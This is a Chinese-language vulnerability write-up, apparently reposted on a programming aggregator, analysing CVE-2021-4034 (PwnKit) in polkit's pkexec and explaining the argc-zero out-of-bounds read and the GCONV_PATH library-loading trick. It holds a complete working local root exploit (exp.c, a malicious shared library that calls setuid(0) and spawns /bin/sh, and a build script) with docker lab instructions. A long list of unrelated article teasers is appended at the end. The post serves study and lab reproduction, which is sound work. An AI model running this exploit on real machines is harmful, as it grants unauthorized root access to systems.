[漏洞分析] CVE-2021-4034 分析
CVE-2021-4034
文章目录
- CVE-2021-4034
- 漏洞简介
- docker环境
- 漏洞原理
- 漏洞触发点
- 漏洞利用
- 一个小细节
- 利用原理
- exp
- 参考
github地址: chenaotian/CVE-2021-4034
漏洞简介
漏洞编号: CVE-2021-4034
漏洞产品: pkexec
影响版本: 影响2009年-今的版本(当前0.105)
源码获取: apt source policykit-1
或 https://launchpad.net/ubuntu/bionic/+package/policykit-1
docker环境
docker 环境: chenaotian/cve-2021-4034
我自己搭建的docker,提供了:
- 自己编译的可源码调试的
pkexec
- 有调试符号的glibc(貌似没啥用)
- gdb 和gdb 插件pwngdb & pwndbg
- 调试环境中的exp
所有东西都在 /root/ 目录中:
- exp 目录就是exp 和run.sh 所在目录,可以直su test 切换到test 用户然后跑
- glibc-2.27 是glibc 源码目录,大概率用不上,用到的时候方便gdb 源码调试
- polkit-0.105 是 policykit 源码包
启动docker:
docker run -d -ti --rm -h cvedebug --name cvedebug --cap-add=SYS_PTRACE chenaotian/cve-2021-4034:latest /bin/bash
测试exp:
cd ~/exp/CVE-2021-4034/
./run.sh
su test
./exp
whoami
漏洞原理
漏洞发生的产品是polkit 下的 pkexec
命令。pkexec
和sudo
类似都是能够让我们以其他用户身份(通常是root) 来执行命令的工具。通过dpkg
命令可以查看pkexec
所属包:
dpkg -S /usr/bin/pkexec
然后获取源码包(我的docker 之中也有),之后根据源码包自己编译可以调试的版本方便调试。
漏洞触发点
漏洞触发原理非常简单
/polkit-0.105/src/programs/pkexec.c : 386 main
int
main (int argc, char *argv[])
{··· ······ ···/* 这段的意思就是,循环遍历用户输入参数,根据输入的不同参数设置值* 但问题在于,他循环遍历的起点是1,没有考虑用户没有输入任何参数的情况*/for (n = 1; n < (guint) argc; n++) {if (strcmp (argv[n], "--help") == 0){opt_show_help = TRUE;}··· ···else //如果是无法识别的参数则跳出循环,这里意味着该参数是想要执行的命令{break;}}··· ···g_assert (argv[argc] == NULL);path = g_strdup (argv[n]); //获取执行命令具体字符串if (path == NULL){···}if (path[0] != '/'){/* g_find_program_in_path() is not suspectible to attacks via the environment *///该函数会根据PATH环境变量寻找要执行命令的绝对地址s = g_find_program_in_path (path); if (s == NULL){···}g_free (path);argv[n] = path = s;//把获取到的绝对地址修改回命令行参数}··· ······ ···
根据代码中我的注释分析:
- 首先main函数中会根据用户输入的命令行参数进行一些变量设置,但这里for 循环的起始值是1,也就是说他默认我们至少会附带一个参数(需要
pkexec
执行的命令) - 如果匹配到非
--
开头的命令行参数,认为是需要执行的命令,则认为该参数是要用pkexec
执行的命令,而跳出循环进行下面逻辑。 - 调用
g_find_program_in_path
函数搜索命令的绝对路径。g_find_program_in_path
函数会根据PATH
环境变量来寻找传入参数(命令)的绝对路径。如传入cat
返回/bin/cat
。 - 将返回的绝对路径写回该命令行参数的位置。(可以理解为从命令转换为命令对应文件的绝对路径)
还是很好理解的,但问题在于:
-
linux 二进制程序运行时会将命令行参数
argv[]
和环境变量environ[]
放到栈底部,并且argv[]
和environ[]
是连着的。其中argv[]
最后一项是null
。
-
如果是命令行启动的
pkexec
切不带任何其他参数,那么argv[0]
为"pkexec"
,argv[1]
为\x00
没啥问题。但如果是用execve
函数启动的pkexec
,不带任何其他参数,那么argv[0]
为\x00
,argv[1]
就到了环境变量了!当读取argv[1]
的时候就会越界读取到environ[0]
命令行直接启动
pkexec
的argc
为1,argv[0]
就是pkexec
路径:
用
execve
函数启动pkexec
,argc
为0:
那这回造成什么影响呢? 就是当以execve
启动时,不接任何其他参数,那么argv[]
长度为0,那么argv[1]
就是environ[0]
这样上面分析的逻辑就变成了,**获取第一个环境变量的值,并且从PATH
环境变量中寻找其绝对路径。如果寻找到则写回第一个环境变量。**那么利用方式如下:
漏洞利用
首先要明确的一点就是,pkexec
是一个特权(suid) 文件:
如何在特权文件中利用环境变量搞点事情呢?首先先了解一个小细节:
一个小细节
linux 的动态连接器ld-linux-x86-64.so.2
会在特权程序执行的时候清除敏感环境变量:
函数_dl_non_dynamic_init: glibc-2.27/elf/dl-support.c : 307
void
_dl_non_dynamic_init (void)
{··· ······ ···if (__libc_enable_secure) //特权模式的情况下{static const char unsecure_envvars[] =UNSECURE_ENVVARS
#ifdef EXTRA_UNSECURE_ENVVARSEXTRA_UNSECURE_ENVVARS
#endif;const char *cp = unsecure_envvars;//循环将危险环境变量列表中的环境变量全部清空(unset)while (cp < unsecure_envvars + sizeof (unsecure_envvars)) {__unsetenv (cp);cp = (const char *) __rawmemchr (cp, '\0') + 1;}#if !HAVE_TUNABLESif (__access ("/etc/suid-debug", F_OK) != 0)__unsetenv ("MALLOC_CHECK_");
#endif}
··· ···
··· ···
}
危险环境变量列表 UNSECURE_ENVVARS
定义如下:
glibc-2.27/sysdeps/generic/unsecvars.h : 10
#define GLIBC_TUNABLES_ENVVAR "GLIBC_TUNABLES\0"
#define UNSECURE_ENVVARS \"GCONV_PATH\0" \"GETCONF_DIR\0" \GLIBC_TUNABLES_ENVVAR \"HOSTALIASES\0" \"LD_AUDIT\0" \"LD_DEBUG\0" \"LD_DEBUG_OUTPUT\0" \"LD_DYNAMIC_WEAK\0" \"LD_HWCAP_MASK\0" \"LD_LIBRARY_PATH\0" \"LD_ORIGIN_PATH\0" \"LD_PRELOAD\0" \"LD_PROFILE\0" \"LD_SHOW_AUXV\0" \"LD_USE_LOAD_BIAS\0" \"LOCALDOMAIN\0" \"LOCPATH\0" \"MALLOC_TRACE\0" \"NIS_PATH\0" \"NLSPATH\0" \"RESOLV_HOST_CONF\0" \"RES_OPTIONS\0" \"TMPDIR\0" \"TZDIR\0"
当检测到程序是特权文件(suid) 的时候,会清空上面的这些环境变量,可以看到,绝大部分是LD_
系列的环境变量,他们都有能指定动态库加载路径的能力。这是防止低权限用户通过这些环境变量让suid 程序加载不可信的so,造成的恶意代码执行进而提权的情况。
而在该漏洞场景下,我们拥有一次任意环境变量写得机会,我们的利用思路就是尝试从上面那些本来没法传入suid 程序中的环境变量中找点东西。
利用原理
由于已经公布了poc,这里直接看答案就很简单了,这里参考了arthepsy的poc。内容很简单,但通过该poc 得知利用关键环境变量是**GCONV_PATH
**。确实是上面危险环境变量列表中的一员,甚至是第一个!
关于GCONV_PATH
与 iconv_open()
函数:
iconv_open()
函数申请一个转换描述符,转换字符序列从编码fromcode
到编码tcode
转换描述符包含转换状态。iconv_open()
函数首先会找到系统提供的gconv-modules
文件,这个文件中包含了各个字符集的相关信息存储的路径,每个字符集的相关信息存储在一个.so文件中。然后再根据gconv-modules
文件的指示去链接参数对应的.so文件执行具体操作。如果存在环境变量GCONV_PATH
,则iconv_open()
函数依照GCONV_PATH
找到gconv-modules
文件,后续操作不变。
也就是说,这里GCONV_PATH
环境变量也有相当于 LD_LIBRARY_PATH
的功能。他可以指定 iconv_open()
函数搜索so库的文件。我们如果可以伪造GCONV_PATH
然后进一步伪造 gconv-modules
最后在伪造一个 so 就可以完成任意so加载以及任意代码执行。
大体思路如下:
-
创建一个 名为
GCONV_PATH=.
目录 -
在
GCONV_PATH=.
目录中创建一个 名为pwnkitdir
的文件,权限带x -
创建一个 名为
pwnkitdir
的目录 -
在
pwnkit
目录中创建gconv-modules
文件,依照格式写入如下内容:module UTF-8// PWNKIT// pwnkit 1
-
在
pwnkit
目录中放入恶意sopwnkit.so
里面是获取shell的代码。 -
设置相关环境变量
- 第一个环境变量
pwnkitdir
- 第二个环境变量
PATH=GCONV_PATH=.
这样g_find_program_in_path
函数组合出的路径就是GCONV_PATH=./pwnkitdir
正好是环境变量的格式,而且./pwnkitdir
目录存在,GCONV_PATH=./pwnkitdir
文件也存在。 CHARSET=PWNKIT
环境变量,在走到iconv_open
前的路径中会用到,用来从gconv-modules
中搜索soSHELL=xxx
,,在走到iconv_open
前的路径中会用到
- 第一个环境变量
-
通过
execve
启动pkexec
参数为空,环境变量为上面设置的值
然后就成功,具体exp如下:
exp
exp.c
#include <stdio.h>
#include <unistd.h>int main(int argc, char **argv)
{char * const a_argv [] = { NULL};char * const a_envp[] = {"pwnkitdir","PATH=GCONV_PATH=.","CHARSET=PWNKIT","SHELL=xxx",NULL};execve("/usr/local/bin/pkexec", a_argv, a_envp); //注意路径根据实际情况修改哦
}
lib.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>static void __attribute__ ((constructor)) exp(void);
static void exp(void)
{setuid(0); seteuid(0); setgid(0); setegid(0);static char *a_argv[] = { "sh", NULL };static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };execve("/bin/sh", a_argv, a_envp);
}
run.sh
mkdir 'GCONV_PATH=.'
touch 'GCONV_PATH=./pwnkitdir'
chmod 777 'GCONV_PATH=./pwnkitdir'
mkdir pwnkitdir
touch pwnkitdir/gconv-modules
echo "module UTF-8// PWNKIT// pwnkit 1" >> pwnkitdir/gconv-modules
gcc -fPIC -shared lib.c -o pwnkitdir/pwnkit.so
gcc exp.c -o exp
利用成功:
参考
漏洞纰漏:https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
arthepsy‘s poc:https://github.com/arthepsy/CVE-2021-4034
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 自适应人工蜂群黏菌算法ISMA(学习笔记_09)
目录 1. 多策略改进黏菌优化算法 1. 自适应可调节反馈因子 2. 算数交叉算子 3. 改进的人工蜂群搜索策略 2. ISMA实现步骤 3. 适应度进化曲线 1. 多策略改进黏菌优化算法 1. 自适应可调节反馈因子 目的:使反馈因子vc 更加准确地描述实际情况下质量和 浓度之间的…...
2024/4/26 14:54:47 - java数组中的最大值(处女篇)
相逢就是缘分,既然你能搜索这个标题,那说明你肯定也不想用传统的循环或者排序来找最大值吧! 那么就来look这个方法!! 考黑板喽!!! Arrays.stream(arr).max().getAsInt() 这就是直…...
2024/4/14 2:57:42 - 景联文科技为人脸识别技术提供AI基础数据服务支持
最近,人脸识别又上热搜了。就在最近,央视网爆出了一种分分钟攻破人脸识别的方法:只需要一张照片,随便一个人用一段包含点头、摇头、说话等动作的驱动视频,原本照片中的人也会随之做出一样的行为,可轻松通过…...
2024/4/20 8:46:21 - 327、今天早上面试linkdoc,体验真是一团糟,搞医疗的一家公司,现场面试
今天早上面试linkdoc,体验真是一团糟,搞医疗的一家公司,现场面试。 凡是现场面试我都非常谨慎,会提前询问HR这家公司几轮面试,每轮面试的面试官分别是谁,当第一面是负责人的时候, 我才会去面。结…...
2024/4/19 13:54:26 - 【pytorch】pytorch建立神经网络模型的基本用法
总结自CS231n Tensor: Like a numpy array, but can run on GPU Autograd: Package for building computational graphs out of Tensors, and automatically computing gradients Module: A neural network layer; may store state or learnable weights torch.clamp(input…...
2024/4/20 0:27:09 - SpringBoot一些注解(用于仅阶段性学习)
本文大佬勿看,小白一枚,本文后序会继续更新 Bean: 给容器添加组件,一般作用在方法上,效果跟在配置文件中写bean标签一样,然后方法名就相当于是id名; 那么在主启动类中,怎么去获取…...
2024/4/19 18:49:28 - 【无标题】ubuntu18.04禁用显卡驱动
依次执行: sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf"sudo bash -c "echo options nouveau modeset0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf" 执行完上面两条指令后&#…...
2024/5/4 21:43:35 - BGP简单实验
一、BGP:边界网关路由协议 --- 动态路由协议 无类别路径矢量EGP协议; 动态路由协议分类--- IGP 内部网关路由协议--AS内部使用 -- RIP OSPF EIGRP ISIS.... AS--自治系统 -- 标准编号 16位 0-65535 其中1-64511公有 64512-65535私有 扩展AS号 32位二进制 …...
2024/4/14 2:57:37 - G1垃圾回收器
Success心得1. 什么是垃圾回收器1.1 什么是垃圾1.2 为什么需要垃圾回收器1.3 垃圾回收器怎么触发2. 垃圾回收器历史2.1 Serial2.2 ParNew2.3 Parallel Scavenge2.4 Serial Old2.5 Parallel Old2.6 CMS2.7 G12.8 吞吐量和低延迟3. 垃圾收集器系列算法3.1 标记--清除3.2 标记--压…...
2024/4/14 2:57:32 - 浅谈智慧医疗中常见的几种数据标注类型
近年来,在科学技术急速发展的背景下,当代医疗正在变得越来越智慧,东软医疗所推出的MDaaS,即医疗设备和医疗影像数据服务,可以提供各种创新医疗数据服务和解决方案,帮助医生提高工作效率,同时也可…...
2024/4/14 2:57:22 - kali-vulnhub:doubletrouble
1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110) 为Debian,没有发现较明显的信息 2.开始扫描端口 $ nmap -Pn 192.168.0.110 Host discovery disabled (-Pn). All addresses will be marked up and scan times will be s…...
2024/4/14 2:58:28 - 数据结构——左倾红黑树
左倾红黑树前提了解红黑树和平衡多叉树的对应关系左倾红黑树基于自顶向下2-3-4树的左倾红黑树基于2-3树的左倾红黑树重要代码左右旋转变色翻转变色向2-3左倾红黑树插入向2-3-4左倾红黑树插入的额外情况插入代码2-3左倾红黑树删除最小值的情况2-3-4左倾红黑树删除最小值的额外情…...
2024/4/7 17:36:21 - JavaScript-BOM对象
Browser Object Model 浏览器对象模型 7.1、window 代表浏览器窗口 window.alert(1)undefinedwindow.innerHeight760window.innerWidth743window.outerHeight864window.outerWidth1536//获取浏览器的宽度和高度,根据调整随时发生改变 7.2、Navigator 封装了浏览…...
2024/4/18 9:19:52 - 六,比特币系统 中 存在的 几种分叉
0,fork: 在一些情境下,BTC system 中的 block chain 出现2条 (甚至 多条)分叉链。 根据 造成 fork 的 不同原因,可以 将fork分为以下2类: 1,state fork: 当有2个 fullnode 同时 挖到1个 block…...
2024/4/19 14:06:45 - golang的简易教程(不定期更新中...)
1.go运行环境搭建: 1).golang的安装 2).go导入第三方包 3).goland运行项目错误 4).go项目的打包部署 2.go的基础: 1).go通过Mutex实现互斥锁(Mutex原理) 2).go的文件操作 3).go的IO 4).go的erros异常 5).go的json 3.go的MySql: 1).使用docker…...
2024/4/19 9:39:01 - 静态树定义常用操作无测试
const int maxn 100; struct node{int data;//数据域int lchild; //指向左子树的指针域int rchild; //指向右子树的指针域 }Node[maxn];int index 0; int newNode(int v){Node[index].data v;Node[index].lchild -1;Node[index].rchild -1;return index; }void search(int…...
2024/4/14 2:58:43 - 1004.最大连续1的个数Ⅲ
class Solution {public int longestOnes(int[] nums, int k) {int left 0, right 0, result 0;while(right < nums.length){if(nums[right] 0){if(k 0){// 若nums[left]一直是1,那么还要往右一个while(nums[left] 1) left;left;}else{--k;}}result Math.…...
2024/4/20 11:56:05 - 不一样角度的javaSE知识点小汇总
目录 一、Java中能出现语句的位置 1、方法的内部(抽象方法除外) 2、类的内部(属性或赋值语句) 3、代码块 4、构造方法: 5、内部类,匿名类,lambda表达式 二、语句什么时候被执行 1.语句写…...
2024/4/19 18:14:33 - Log4j2 + SLF4j打造日志系统
原创:Log4j2 SLF4j打造日志系统 - 云社区 - 腾讯云 2019-01-15阅读 2.3K0 目录 一:前言二:添加依赖 2.1:去除直接和间接依赖的log4j1和SLF4j2.2:添加依赖三:xml配置 3.1:log4j2.xml常用demo…...
2024/4/14 2:58:33 - Java安全API
Java安全API目录概述小结:参考资料和推荐阅读LD is tigger forever,CG are not brothers forever, throw the pot and shine forever. Modesty is not false, solid is not naive, treacherous but not deceitful, stay with good people, an…...
2024/4/19 9:17:25
最新文章
- Java面试题:什么是线程安全,如何使代码线程安全?
线程安全是指在多线程环境中,代码能够正确地工作而不会导致数据不一致或程序崩溃。当多个线程访问共享资源时,如果这些线程的执行顺序是不确定的,可能会导致数据的不一致性。为了确保线程安全,需要采取一定的措施来控制对共享资源…...
2024/5/4 22:08:51 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - PCF8591(ADDA转换芯片)
工具 1.Proteus 8 仿真器 2.keil 5 编辑器 原理图 讲解 PCF8591是一个单片集成、单独供电、低功耗、8-bit CMOS数据获取器件。PCF8591具有4个模拟输入、1个模拟输出和1个串行IC总线接口。PCF8591的3个地址引脚A0, A1和A2可用于硬件地址编程,允许在同个I2C总线上接…...
2024/5/3 23:21:41 - 第十三届蓝桥杯大赛软件赛省赛C/C++ 大学 B 组 题解
VP比赛链接 : 数据加载中... - 蓝桥云课 1 . 九进制 转 十进制 直接模拟就好了 #include <iostream> using namespace std; int main() {// 请在此输入您的代码int x 22*92*81*9;cout << x << endl ;return 0; } 2 . 顺子日期 枚举出每个情况即可 : …...
2024/4/30 1:59:34 - 【stm32】I2C通信协议
【stm32】I2C通信协议 概念及原理 如果我们想要读写寄存器来控制硬件电路,就至少需要定义两个字节数据 一个字节是我们要读写哪个寄存器,也就是指定寄存器的地址 另一个字节就是这个地址下存储寄存器的内容 写入内容就是控制电路,读出内容就…...
2024/5/4 15:30:22 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/5/1 17:30:59 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/5/2 16:16:39 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/29 2:29:43 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/5/3 23:10:03 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/27 17:58:04 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/27 14:22:49 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/28 1:28:33 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/30 9:43:09 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/27 17:59:30 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/5/4 18:20:48 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/28 1:34:08 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/26 19:03:37 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/29 20:46:55 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/30 22:21:04 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/5/1 4:32:01 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/5/4 2:59:34 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/28 5:48:52 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/30 9:42:22 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/5/2 9:07:46 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/30 9:42:49 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
